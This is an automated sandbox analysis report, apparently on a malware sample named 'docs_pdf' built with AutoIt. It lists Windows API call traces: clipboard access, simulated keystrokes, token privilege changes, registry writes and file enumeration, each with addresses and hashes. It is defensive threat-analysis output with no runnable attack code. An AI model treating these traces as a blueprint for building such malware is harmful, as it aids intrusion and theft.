                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            Similarity
                                                            • API ID: _wcscmp
                                                            • String ID:
                                                            • API String ID: 856254489-0
                                                            APIs
                                                              • Part of subcall function 000F4D13: FreeLibrary.KERNEL32(00000000,?), ref: 000F4D4D
                                                              • Part of subcall function 0011548B: __wfsopen.LIBCMT ref: 00115496
                                                            • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,001B62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 000F4F6F
                                                              • Part of subcall function 000F4CC8: FreeLibrary.KERNEL32(00000000), ref: 000F4D02
                                                              • Part of subcall function 000F4DD0: _memmove.LIBCMT ref: 000F4E1A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            Similarity
                                                            • API ID: Library$Free$Load__wfsopen_memmove
                                                            • String ID:
                                                            • API String ID: 1396898556-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            APIs
                                                            • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,000F5807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 000F5D76
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            Similarity
                                                            • API ID: _wcscmp
                                                            • String ID:
                                                            • API String ID: 856254489-0
                                                            APIs
                                                            • __lock_file.LIBCMT ref: 00114AD6
                                                              • Part of subcall function 00118D68: __getptd_noexit.LIBCMT ref: 00118D68
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            Similarity
                                                            • API ID: __getptd_noexit__lock_file
                                                            • String ID:
                                                            • API String ID: 2597487223-0
                                                            APIs
                                                            • FreeLibrary.KERNEL32(?,?,001B62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 000F4FDE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            APIs
                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001109F4
                                                              • Part of subcall function 000F7D2C: _memmove.LIBCMT ref: 000F7D66
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            Similarity
                                                            • API ID: LongNamePath_memmove
                                                            • String ID:
                                                            • API String ID: 2514874351-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            Similarity
                                                            • API ID: __fread_nolock
                                                            • String ID:
                                                            • API String ID: 2638373210-0
                                                            APIs
                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001109F4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            Similarity
                                                            • API ID: LongNamePath
                                                            • String ID:
                                                            • API String ID: 82841172-0
                                                            APIs
                                                            • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0012E16B,?,?,00000000), ref: 000F5DBF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: __wfsopen
                                                            • String ID:
                                                            • API String ID: 197181222-0
                                                            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                            • Instruction ID: c8c77840a47c664caa81f564794db8fbfd9d72ac46931c5a7ff20c1c3d0a6ff5
                                                            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                            • Instruction Fuzzy Hash: 73B0927684020CB7DF012E82EC02A993B1A9B90678F808020FB0C18562A673A6A09689
                                                            APIs
                                                            • GetLastError.KERNEL32(00000002,00000000), ref: 0015D46A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID:
                                                            • API String ID: 1452528299-0
                                                            • Opcode ID: 361bba4beac496ea59f3137ec911f06da2929f9cb6f2a380ad15c05a62dd7f2c
                                                            • Instruction ID: 67953247ed1ece6889d6733f0f2ebf172ed5eb3a5046699dbb47a2cb8da9f265
                                                            • Opcode Fuzzy Hash: 361bba4beac496ea59f3137ec911f06da2929f9cb6f2a380ad15c05a62dd7f2c
                                                            • Instruction Fuzzy Hash: A7717330208705CFC714EF24D491AAAB7E0BF88315F04456DFAA68B6A2DB70ED49DB53
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction ID: 13b12f3aab1e64ee96384f7eeeb5c8730ca14356c794b880665f9ecb9f02b510
                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction Fuzzy Hash: E931D370A01106DBC71EDF59C4809A9F7A6FF5D300B658AA9E409CB651E7B1EEC1CBC0
                                                            APIs
                                                            • Sleep.KERNELBASE(000001F4), ref: 036E22B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2106556596.00000000036E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_36e0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction ID: d5487aea65d8a3c42d1fc258f97690f9cc80c2092090a683a39fdbcdf493d11d
                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction Fuzzy Hash: ACE0E67494110EDFDB00EFB8D54969E7FB4EF04701F1005A1FD01D2280D6309D508A72
                                                            APIs
                                                              • Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623
                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0017CE50
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0017CE91
                                                            • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0017CED6
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0017CF00
                                                            • SendMessageW.USER32 ref: 0017CF29
                                                            • _wcsncpy.LIBCMT ref: 0017CFA1
                                                            • GetKeyState.USER32(00000011), ref: 0017CFC2
                                                            • GetKeyState.USER32(00000009), ref: 0017CFCF
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0017CFE5
                                                            • GetKeyState.USER32(00000010), ref: 0017CFEF
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0017D018
                                                            • SendMessageW.USER32 ref: 0017D03F
                                                            • SendMessageW.USER32(?,00001030,?,0017B602), ref: 0017D145
                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0017D15B
                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0017D16E
                                                            • SetCapture.USER32(?), ref: 0017D177
                                                            • ClientToScreen.USER32(?,?), ref: 0017D1DC
                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0017D1E9
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0017D203
                                                            • ReleaseCapture.USER32 ref: 0017D20E
                                                            • GetCursorPos.USER32(?), ref: 0017D248
                                                            • ScreenToClient.USER32(?,?), ref: 0017D255
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0017D2B1
                                                            • SendMessageW.USER32 ref: 0017D2DF
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0017D31C
                                                            • SendMessageW.USER32 ref: 0017D34B
                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0017D36C
                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0017D37B
                                                            • GetCursorPos.USER32(?), ref: 0017D39B
                                                            • ScreenToClient.USER32(?,?), ref: 0017D3A8
                                                            • GetParent.USER32(?), ref: 0017D3C8
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0017D431
                                                            • SendMessageW.USER32 ref: 0017D462
                                                            • ClientToScreen.USER32(?,?), ref: 0017D4C0
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0017D4F0
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0017D51A
                                                            • SendMessageW.USER32 ref: 0017D53D
                                                            • ClientToScreen.USER32(?,?), ref: 0017D58F
                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0017D5C3
                                                              • Part of subcall function 000F25DB: GetWindowLongW.USER32(?,000000EB), ref: 000F25EC
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0017D65F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                            • String ID: @GUI_DRAGID$F
                                                            • API String ID: 3977979337-4164748364
                                                            • Opcode ID: 60e73bf0c03b205af862ca561e61cb6f342d422c3b430dd732f3b9549c06998d
                                                            • Instruction ID: 1c2fe9f2176aa616d99e1e744f3740c37530f5ae59f16e9728603c4b066c9d52
                                                            • Opcode Fuzzy Hash: 60e73bf0c03b205af862ca561e61cb6f342d422c3b430dd732f3b9549c06998d
                                                            • Instruction Fuzzy Hash: 27429C70204345AFC725CF28C884EAABFF5FF48714F14862DF699976A1CB319991CB92
                                                            APIs
                                                            • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0017873F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: %d/%02d/%02d
                                                            • API String ID: 3850602802-328681919
                                                            • Opcode ID: 21154f6f727f9455c43f330a031f3ac905da3e48e1c2a5120081ef700b1f0c77
                                                            • Instruction ID: 388157a8fe9a815341159c293796d052b05614de5750ec3aa4ca01b9f90b4a8e
                                                            • Opcode Fuzzy Hash: 21154f6f727f9455c43f330a031f3ac905da3e48e1c2a5120081ef700b1f0c77
                                                            • Instruction Fuzzy Hash: 7612A371580244ABEB299F28CC4DFAB7BB4EF49710F208169F91EDA1E1DF709981CB50
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _memmove$_memset
                                                            • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                            • API String ID: 1357608183-1798697756
                                                            • Opcode ID: 9cf5b8e1104fd999433e1aecacd9d81a1b50bc96a1d92e335cd36ecdb2d3a85c
                                                            • Instruction ID: a4cb0dc1bc56db4b88b8165b2ef3250c425d96f8587e6bd440780b4084440b53
                                                            • Opcode Fuzzy Hash: 9cf5b8e1104fd999433e1aecacd9d81a1b50bc96a1d92e335cd36ecdb2d3a85c
                                                            • Instruction Fuzzy Hash: F3939171E04216DBDB28CF98C881BADB7B1FF48710F65816AE955EB2D0E7709E81CB50
                                                            APIs
                                                            • GetForegroundWindow.USER32(00000000,?), ref: 000F4A3D
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0012DA8E
                                                            • IsIconic.USER32(?), ref: 0012DA97
                                                            • ShowWindow.USER32(?,00000009), ref: 0012DAA4
                                                            • SetForegroundWindow.USER32(?), ref: 0012DAAE
                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0012DAC4
                                                            • GetCurrentThreadId.KERNEL32 ref: 0012DACB
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0012DAD7
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0012DAE8
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0012DAF0
                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 0012DAF8
                                                            • SetForegroundWindow.USER32(?), ref: 0012DAFB
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0012DB10
                                                            • keybd_event.USER32(00000012,00000000), ref: 0012DB1B
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0012DB25
                                                            • keybd_event.USER32(00000012,00000000), ref: 0012DB2A
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0012DB33
                                                            • keybd_event.USER32(00000012,00000000), ref: 0012DB38
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0012DB42
                                                            • keybd_event.USER32(00000012,00000000), ref: 0012DB47
                                                            • SetForegroundWindow.USER32(?), ref: 0012DB4A
                                                            • AttachThreadInput.USER32(?,?,00000000), ref: 0012DB71
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 4125248594-2988720461
                                                            • Opcode ID: 2e6a5b66633fe077ceb60012a9f27e7a46b180d2e62530f812b0b1699c2b1a9e
                                                            • Instruction ID: 4ff3e69a172eb928a70d50984325106fc16897be4249321998961fa9b0f7f520
                                                            • Opcode Fuzzy Hash: 2e6a5b66633fe077ceb60012a9f27e7a46b180d2e62530f812b0b1699c2b1a9e
                                                            • Instruction Fuzzy Hash: 06315571A403187FEB216F61EC4AF7F3E7CEB44B50F114029FA04EA1D0C6705991AAA1
                                                            APIs
                                                              • Part of subcall function 00148CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00148D0D
                                                              • Part of subcall function 00148CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00148D3A
                                                              • Part of subcall function 00148CC3: GetLastError.KERNEL32 ref: 00148D47
                                                            • _memset.LIBCMT ref: 0014889B
                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 001488ED
                                                            • CloseHandle.KERNEL32(?), ref: 001488FE
                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00148915
                                                            • GetProcessWindowStation.USER32 ref: 0014892E
                                                            • SetProcessWindowStation.USER32(00000000), ref: 00148938
                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00148952
                                                              • Part of subcall function 00148713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00148851), ref: 00148728
                                                              • Part of subcall function 00148713: CloseHandle.KERNEL32(?,?,00148851), ref: 0014873A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                            • String ID: $default$winsta0
                                                            • API String ID: 2063423040-1027155976
                                                            • Opcode ID: 118cfcd43889c8695a7b9dee8eadfa207fcd54d0517f0503c48c0944de086992
                                                            • Instruction ID: f2927e42b2ea69fcc4a52c6ebdf69ef2e7f5691571d02030a0cbba54c4f7acaf
                                                            • Opcode Fuzzy Hash: 118cfcd43889c8695a7b9dee8eadfa207fcd54d0517f0503c48c0944de086992
                                                            • Instruction Fuzzy Hash: 42816971900209AFDF11DFA4CC45AEEBBB8FF08344F28416AF914A7261DB718E95DB61
                                                            APIs
                                                            • OpenClipboard.USER32(0017F910), ref: 00164284
                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 00164292
                                                            • GetClipboardData.USER32(0000000D), ref: 0016429A
                                                            • CloseClipboard.USER32 ref: 001642A6
                                                            • GlobalLock.KERNEL32(00000000), ref: 001642C2
                                                            • CloseClipboard.USER32 ref: 001642CC
                                                            • GlobalUnlock.KERNEL32(00000000,00000000), ref: 001642E1
                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 001642EE
                                                            • GetClipboardData.USER32(00000001), ref: 001642F6
                                                            • GlobalLock.KERNEL32(00000000), ref: 00164303
                                                            • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00164337
                                                            • CloseClipboard.USER32 ref: 00164447
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                            • String ID:
                                                            • API String ID: 3222323430-0
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0015C9F8
                                                            • FindClose.KERNEL32(00000000), ref: 0015CA4C
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0015CA71
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0015CA88
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0015CAAF
                                                            • __swprintf.LIBCMT ref: 0015CAFB
                                                            • __swprintf.LIBCMT ref: 0015CB3E
                                                              • Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82
                                                            • __swprintf.LIBCMT ref: 0015CB92
                                                              • Part of subcall function 001138D8: __woutput_l.LIBCMT ref: 00113931
                                                            • __swprintf.LIBCMT ref: 0015CBE0
                                                              • Part of subcall function 001138D8: __flsbuf.LIBCMT ref: 00113953
                                                              • Part of subcall function 001138D8: __flsbuf.LIBCMT ref: 0011396B
                                                            • __swprintf.LIBCMT ref: 0015CC2F
                                                            • __swprintf.LIBCMT ref: 0015CC7E
                                                            • __swprintf.LIBCMT ref: 0015CCCD
                                                            Similarity
                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                            • API String ID: 3953360268-2428617273
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0015F221
                                                            • _wcscmp.LIBCMT ref: 0015F236
                                                            • _wcscmp.LIBCMT ref: 0015F24D
                                                            • GetFileAttributesW.KERNEL32(?), ref: 0015F25F
                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 0015F279
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0015F291
                                                            • FindClose.KERNEL32(00000000), ref: 0015F29C
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0015F2B8
                                                            • _wcscmp.LIBCMT ref: 0015F2DF
                                                            • _wcscmp.LIBCMT ref: 0015F2F6
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0015F308
                                                            • SetCurrentDirectoryW.KERNEL32(001AA5A0), ref: 0015F326
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0015F330
                                                            • FindClose.KERNEL32(00000000), ref: 0015F33D
                                                            • FindClose.KERNEL32(00000000), ref: 0015F34F
                                                            Similarity
                                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                            • String ID: *.*
                                                            • API String ID: 1803514871-438819550
                                                            APIs
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00170BDE
                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,0017F910,00000000,?,00000000,?,?), ref: 00170C4C
                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00170C94
                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00170D1D
                                                            • RegCloseKey.ADVAPI32(?), ref: 0017103D
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0017104A
                                                            Similarity
                                                            • API ID: Close$ConnectCreateRegistryValue
                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                            • API String ID: 536824911-966354055
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0015F37E
                                                            • _wcscmp.LIBCMT ref: 0015F393
                                                            • _wcscmp.LIBCMT ref: 0015F3AA
                                                              • Part of subcall function 001545C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 001545DC
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0015F3D9
                                                            • FindClose.KERNEL32(00000000), ref: 0015F3E4
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0015F400
                                                            • _wcscmp.LIBCMT ref: 0015F427
                                                            • _wcscmp.LIBCMT ref: 0015F43E
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0015F450
                                                            • SetCurrentDirectoryW.KERNEL32(001AA5A0), ref: 0015F46E
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0015F478
                                                            • FindClose.KERNEL32(00000000), ref: 0015F485
                                                            • FindClose.KERNEL32(00000000), ref: 0015F497
                                                            Similarity
                                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                            • String ID: *.*
                                                            • API String ID: 1824444939-438819550
                                                            APIs
                                                              • Part of subcall function 0014874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00148766
                                                              • Part of subcall function 0014874A: GetLastError.KERNEL32(?,0014822A,?,?,?), ref: 00148770
